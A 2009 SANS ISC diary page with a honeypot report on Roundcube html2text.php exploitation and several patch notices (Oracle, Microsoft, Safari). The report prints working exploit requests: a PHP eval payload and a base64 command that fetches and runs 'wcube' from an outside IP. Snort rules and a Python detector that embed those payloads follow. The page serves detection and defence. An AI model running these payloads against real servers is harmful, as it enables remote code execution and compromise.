
SANS ISC InfoSec Handlers Diary Blog



Roundcube Webmail follow-up

Published: 2009-01-13
Last Updated: 2009-01-15 07:58:08 UTC
by Toby Kohlenberg (Version: 1)

ISC Reader David Wharton sent us an excellent follow-up to our previous diary entry - http://isc.sans.org/diary.html?storyid=5599

With his permission I'm simply going to quote his email report rather than try to summarize his excellent work:


As reported previously I set up a pot of honey for the roundcube vulnerability scanners who continue to hit my server. Based on data gathered from that honeypot, I was able to capture their exploit attempt and set up a second stage honeypot, which my colleague Nathan Fowler (submitter of http://isc.sans.org/diary.html?storyid=5599) and I refer to as a "fermented honeypot".

A fermented honeypot is one that has been set up based on exploit attempts identified by a first stage honeypot. What happens is that the attacker(s) get all sticky in the original honeypot and when they come back for more sweetness, they get the fermented honeypot too. Now, along with getting all sticky in the first honeypot, they get all drunk on excitement in the fermented honeypot. To compound matters, most of those who get into the fermented honeypot are script kiddies and as we all know, they are too young to drink. Since script kiddies are delinquents, they jump on the chance to indulge in the fermented honeypot, adding under age drinking to their list of crimes of hacking and compromising systems.

Consequently, the fermentation is not without a vice. Much like over consumption of alcohol the participant experiences a hang-over directly proportional to the high experienced during intoxication. It is during this stage that the fermented honeypot is the most effective, as the attacker realizes through suffering that they've been the victim and the perceived victim is the attacker.

Development of a fermented honeypot is not without effort. There is no typical Win32 click-n-create nonsense. A fermented honeypot must be specifically crafted to correctly emulate the focused attack. The author, or 'brew master', is well capable of taking a traditional honeypot and fermenting it accordingly. This is the first instance of a fermented honeypot that we know of.

Now that a fermented honeypot has been explained, here is the interesting data captured:

---

POST /roundcube/bin/html2text.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Host: xx.xx.xx.xx
Accept: ZWNobyAoMzMzMjEyKzQzMjQ1NjY2KS4iICI7O3Bhc3N0aHJ1KCJ1bmFtZSAtYTtpZCIpOw==
Content-Length: 54

<b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>
13:20:52.322589 IP 192.168.1.100.http > 209.160.20.34.33357: P 123078:123416(338) ack 1192 win 96 <nop,nop,timestamp 418993870 456497310>
E....g@.@..;...d...".P.M.f...W5d...`,&.....
..V..5..HTTP/1.1 200 OK
Date: Tue, 13 Jan 2009 19:20:52 GMT
Server: Apache
Last-Modified: Mon, 12 Jan 2009 16:49:04 GMT
ETag: "8c824b-63-4604be2662000"
Accept-Ranges: bytes
Content-Length: 99
Content-Type: text/plain; charset=ISO-8859-1

43578878 Linux lulzserver 2.6.24-22-server #1 SMP Mon Nov 24 19:14:19 UTC 2008 i686 GNU/Linux
root

13:20:52.397462 IP 209.160.20.34.33357 > 192.168.1.100.http: . ack 123416 win 702 <nop,nop,timestamp 456497462 418993870>
E..4.F@.6......"...d.M.P.W5d.f.(....,......
.5.6..V.
13:20:54.407674 IP 209.160.20.34.33357 > 192.168.1.100.http: P 1192:1571(379) ack 123416 win 702 <nop,nop,timestamp 456499424 418993870>
E....G@.6..2..."...d.M.P.W5d.f.(....n......
.5....V.POST /roundcube/bin/html2text.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Host: xx.xx.xx.xx
Accept: cGFzc3RocnUoImNkIC90bXA7d2dldCA4NS4yMTQuNjQuMjI1L3djdWJlO2NobW9kICt4IHdjdWJlOy4vd2N1YmUgPi9kZXYvbnVsbCAyPi9kZXYvbnVsbCAmIik7
Content-Length: 54

<b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>

---

In both exploits, the payload causes the HTTP Accept header to be decoded and executed. The second exploit decodes to:

passthru("cd /tmp;wget 85.214.64.225/wcube;chmod +x wcube;./wcube >/dev/null 2>/dev/null &");

This appears to attempt to grab the wcube file from 85.214.64.225 and execute it. Attempts to retrieve that file have met with HTTP 404 responses.

Here are Snort rules for the new exploit. These are exploit specific and have not been tested, but should do the trick.

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET CURRENT_EVENTS Unknown Roundcube Vulnerability Exploit Attempt 1"; flow:to_server,established; content:"POST /roundcube/bin/html2text.php HTTP/1."; nocase; content:"Accept: cGFzc3RocnUoImNkIC90bXA7d2dldCA4NS4yMTQuNjQuMjI1L3djdWJlO2NobW9kICt4IHdjdWJlOy4vd2N1YmUgPi9kZXYvbnVsbCAyPi9kZXYvbnVsbCAmIik7"; classtype:exploit_attempt; reference:url,isc.sans.org/diary.html?storyid=5599; sid:2009xxx; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET CURRENT_EVENTS Unknown Roundcube Vulnerability Exploit Attempt 2"; flow:to_server,established; content:"POST /roundcube/bin/html2text.php HTTP/1."; nocase; content:"passthru(|22|cd /tmp|3B|wget 85.214.64.225/wcube|3B|chmod +x wcube|3B|./wcube >/dev/null 2>/dev/null &|22|)|3B|"; classtype:exploit_attempt; reference:url,isc.sans.org/diary.html?storyid=5599; sid:2009xxx; rev:1;)


UPDATE: Adam Pointon emailed and pointed out that we should have warned that the use of the base64 Accept string in the first Snort signature means it is unlikely to trigger consistently: that string is attacker-supplied and is meant to change from request to request (the two captures above already carry different values). Note also that the second signature looks for the decoded passthru(...) text, which only exists after base64_decode() has run on the server; the captured requests carry the encoded value in the Accept header and the same EVAL body, so a plaintext content match will not see them either. As always, be careful to validate signatures no matter where you get them from.
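As an added example (not part of David Wharton's report or of the diary itself), the following Python detector applies Adam's point: rather than matching one base64 Accept value, it matches the part of the exploit that stays constant, the `{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}` POST body, then decodes whichever request header that body names and flags PHP execution functions in the result. The three sample requests are constructed for the example; the two Accept values are the ones seen in the captures above, and `exact_accept_signature()` mirrors what the first Snort rule does so the two approaches can be compared.

```python
import base64
import binascii
import re

# Constructed sample requests. The two Accept values are the ones seen in the
# captures above; the rest of each request is made up for this example.
ACCEPT_UNAME = "ZWNobyAoMzMzMjEyKzQzMjQ1NjY2KS4iICI7O3Bhc3N0aHJ1KCJ1bmFtZSAtYTtpZCIpOw=="
ACCEPT_WCUBE = "cGFzc3RocnUoImNkIC90bXA7d2dldCA4NS4yMTQuNjQuMjI1L3djdWJlO2NobW9kICt4IHdjdWJlOy4vd2N1YmUgPi9kZXYvbnVsbCAyPi9kZXYvbnVsbCAmIik7"
EXPLOIT_BODY = "<b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>"


def build_request(accept, body, path="/roundcube/bin/html2text.php"):
    """Assemble a raw HTTP/1.1 POST shaped like the scanner traffic in the captures."""
    return (f"POST {path} HTTP/1.1\r\n"
            "User-Agent: Mozilla/5.0\r\n"
            "Host: xx.xx.xx.xx\r\n"
            f"Accept: {accept}\r\n"
            f"Content-Length: {len(body)}\r\n"
            "\r\n" + body)


REQ_UNAME = build_request(ACCEPT_UNAME, EXPLOIT_BODY)
REQ_WCUBE = build_request(ACCEPT_WCUBE, EXPLOIT_BODY)
REQ_BENIGN = build_request("text/html,application/xhtml+xml", "<b>hello</b>")

# PHP complex-syntax interpolation "{${ expr }}": the stable marker of this exploit.
INTERP_RE = re.compile(r"\{\$\{.*?\}\}", re.S)
# eval(base64_decode($_SERVER[HTTP_xxx])): capture which request header gets executed.
EVAL_HDR_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\$_SERVER\s*\[\s*['\"]?HTTP_(\w+)['\"]?\s*\]", re.I)
# PHP functions that hand the decoded string to a shell or back to the interpreter.
DANGEROUS_RE = re.compile(r"\b(passthru|system|exec|shell_exec|popen|proc_open|eval)\s*\(", re.I)


def parse_request(raw):
    """Split a raw request into (method, path, {lowercased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def decode_b64(value):
    """Strict base64 decode; returns None for anything that is not valid base64."""
    try:
        return base64.b64decode(value, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def inspect(raw):
    """Return a list of findings for one request (empty if it looks clean)."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or not path.lower().endswith("/html2text.php"):
        return []
    m = EVAL_HDR_RE.search(body)
    if not (INTERP_RE.search(body) and m):
        return []
    php_name = m.group(1)                          # e.g. ACCEPT, USER_AGENT
    header = php_name.lower().replace("_", "-")    # e.g. accept, user-agent
    findings = [f"body evals base64 of the {header} header"]
    decoded = decode_b64(headers.get(header, ""))
    if decoded is None:
        return findings
    for fn in DANGEROUS_RE.findall(decoded):
        findings.append(f"decoded {header} header calls {fn.lower()}()")
    findings.append(f"decoded payload: {decoded}")
    return findings


def exact_accept_signature(raw):
    """What the first Snort rule does: match one specific base64 Accept value."""
    return ("POST /roundcube/bin/html2text.php HTTP/1." in raw
            and f"Accept: {ACCEPT_WCUBE}" in raw)


if __name__ == "__main__":
    for name, req in (("uname", REQ_UNAME), ("wcube", REQ_WCUBE), ("benign", REQ_BENIGN)):
        print(name, "exact-signature:", exact_accept_signature(req))
        for finding in inspect(req):
            print("   ", finding)
```

Run against the three samples, the exact-string check fires only on the wcube request, while `inspect()` flags both exploit requests (and prints the decoded commands, which is what an analyst actually wants to see) and stays quiet on the benign one. The decode step is strict on purpose: a normal Accept value is not valid base64 and is simply reported as undecodable rather than guessed at.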


The Oracle Patches are here

Published: 2009-01-13
Last Updated: 2009-01-14 00:09:44 UTC
by Toby Kohlenberg (Version: 1)

And boy are there a lot of them. The overall patch is listed as CRITICAL and from the details, I would strongly agree.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

They have updates for a large number of products. Each "Full table" link below leads to the update table listing the CVE numbers, the CVSS scoring details, and the protocol, component and versions affected.

  • Oracle Database:
    • 10 patches for Oracle Database, none of which are remotely exploitable without authentication
    • 9 patches for Secure Backup, all of which are remotely exploitable without authentication
    • 1 patch for TimesTen Data Server, which is remotely exploitable without authentication
    • Full table here
  • Oracle Application Server:
    • 4 patches, of which 2 are remotely exploitable without authentication
    • Full table here
  • Oracle Collaboration Suite
    • 1 patch which isn't remotely exploitable without authentication
    • Full table here
  • Oracle E-Business Suite and applications
    • 4 patches none of which are remotely exploitable without authentication
    • Full table here
  • Oracle Enterprise Manager
    • 1 patch which isn't remotely exploitable without authentication
    • Full table here
  • Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne
  • BEA Product Suite
    • 5 patches all of which are remotely exploitable without authentication
    • Full table here

 


New info disclosure vuln in Safari reported

Published: 2009-01-13
Last Updated: 2009-01-13 23:07:45 UTC
by Toby Kohlenberg (Version: 1)

Ismael Valenzuela pointed us at Brian Mastenbrook's blog, where he has published a new information disclosure vulnerability in Safari. The vulnerability potentially allows a malicious website to read files on the local system.

The vulnerability applies to

  • anyone running OS X 10.5 who has left the default setting for the RSS feed reader in place; which browser you use is irrelevant
  • Windows users of Safari

According to Brian, he has contacted Apple but has not yet had a response.


January Black Tuesday Overview

Published: 2009-01-13
Last Updated: 2009-01-13 21:12:26 UTC
by Johannes Ullrich (Version: 1)

Overview of the January 2009 Microsoft patches (KB article) and their status.

MS09-001  Vulnerabilities in SMB Could Allow Remote Code Execution
  Affected: Windows (KB958687; CVE-2008-4114, CVE-2008-4834, CVE-2008-4835)
  Contra indications: none listed
  Known exploits: no known exploits. Microsoft considers a working exploit unlikely.
  Microsoft rating: Critical
  ISC rating(*): clients Critical, servers Critical
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment of the machine and the common measures people typically already have in place. For servers we presume simple best practices, such as not using Outlook, MSIE, Word etc. for traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

UPDATE:

ZDI has published notices (ZDI-09-001, ZDI-09-002) for these that contain a small amount of additional information beyond what Microsoft has published:

001 refers to CVE-2008-4834 and adds:

"The specific flaw exists in the processing of SMB requests. By specifying malformed values during an NT Trans request an attacker can cause the target system to kernel panic thereby requiring a reboot of the system. Further manipulation can theoretically result in remote unauthenticated code execution."

002 refers to CVE-2008-4835 and adds:

"The specific flaw exists in the processing of SMB requests. By specifying malformed values during an NT Trans2 request an attacker can cause the target system to kernel panic thereby requiring a reboot of the system. Further manipulation can theoretically result in remote unauthenticated code execution."


SANS publishes Top 25 most dangerous programming errors

Published: 2009-01-13
Last Updated: 2009-01-13 21:02:05 UTC
by Toby Kohlenberg (Version: 1)

Just a quick note in between patch info. SANS has published a list of the "top 25" worst programming errors in terms of security impact. You can read the full details here: http://www.sans.org/top25errors/


The Oracle Patches are Coming! The Oracle Patches are Coming!

Published: 2009-01-13
Last Updated: 2009-01-13 19:25:01 UTC
by Toby Kohlenberg (Version: 1)

Oracle has posted a pre-release announcement for their January patch release and it looks to be big. To quote Oracle:

"This Critical Patch Update contains 41 security fixes across hundreds of Oracle products.  Some of the vulnerabilities addressed in this Critical Patch Update affect multiple products.  Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible.

Vulnerabilities fixed by Critical Patch Updates are scored using the standard CVSS 2.0 scoring (see Oracle's Use of CVSS Scoring). The highest CVSS 2.0 base score of vulnerabilities across all products is 10.0 (These vulnerabilities affect Oracle Secure Backup and WebLogic Server Plugin for Apache, Sun and IIS Web servers)."

There isn't a tremendous amount of detail yet, but here is the list of products with vulnerabilities:

• Oracle Database 11g, version 11.1.0.6
• Oracle Database 10g Release 2, versions 10.2.0.2, 10.2.0.3, 10.2.0.4
• Oracle Database 10g, version 10.1.0.5
• Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV
• Oracle Secure Backup version 10.2.0.2, 10.2.0.3
• Oracle Secure Backup version 10.1.0.1, 10.1.0.2, 10.1.0.3
• Oracle TimesTen In-Memory Database version 7.0.5.1.0, 7.0.5.2.0, 7.0.5.3.0, 7.0.5.4.0
• Oracle Application Server 10g Release 3 (10.1.3), version 10.1.3.3.0
• Oracle Application Server 10g Release 2 (10.1.2), versions 10.1.2.2.0, 10.1.2.3.0
• Oracle Collaboration Suite 10g, version 10.1.2
• Oracle E-Business Suite Release 12, version 12.0.6
• Oracle E-Business Suite Release 11i, version 11.5.10.2
• Oracle Enterprise Manager Grid Control 10g Release 4, version 10.2.0.4
• PeopleSoft Enterprise HRMS versions 8.9, 9.0 and 9.1
• JD Edwards Tools version 8.97
• Oracle WebLogic Server (formerly BEA WebLogic Server) 10.0 released through MP1, 10.3 GA
• Oracle WebLogic Server (formerly BEA WebLogic Server) 9.0 GA, 9.1 GA, 9.2 released through MP3
• Oracle WebLogic Server (formerly BEA WebLogic Server) 8.1 released through SP6
• Oracle WebLogic Server (formerly BEA WebLogic Server) 7.0 released through SP7
• Oracle WebLogic Portal (formerly BEA WebLogic Portal) 10.0 released through MP1, 10.2 GA, 10.3 GA
• Oracle WebLogic Portal (formerly BEA WebLogic Portal) 9.2 released through MP3
• Oracle WebLogic Portal (formerly BEA WebLogic Portal) 8.1 released through SP6
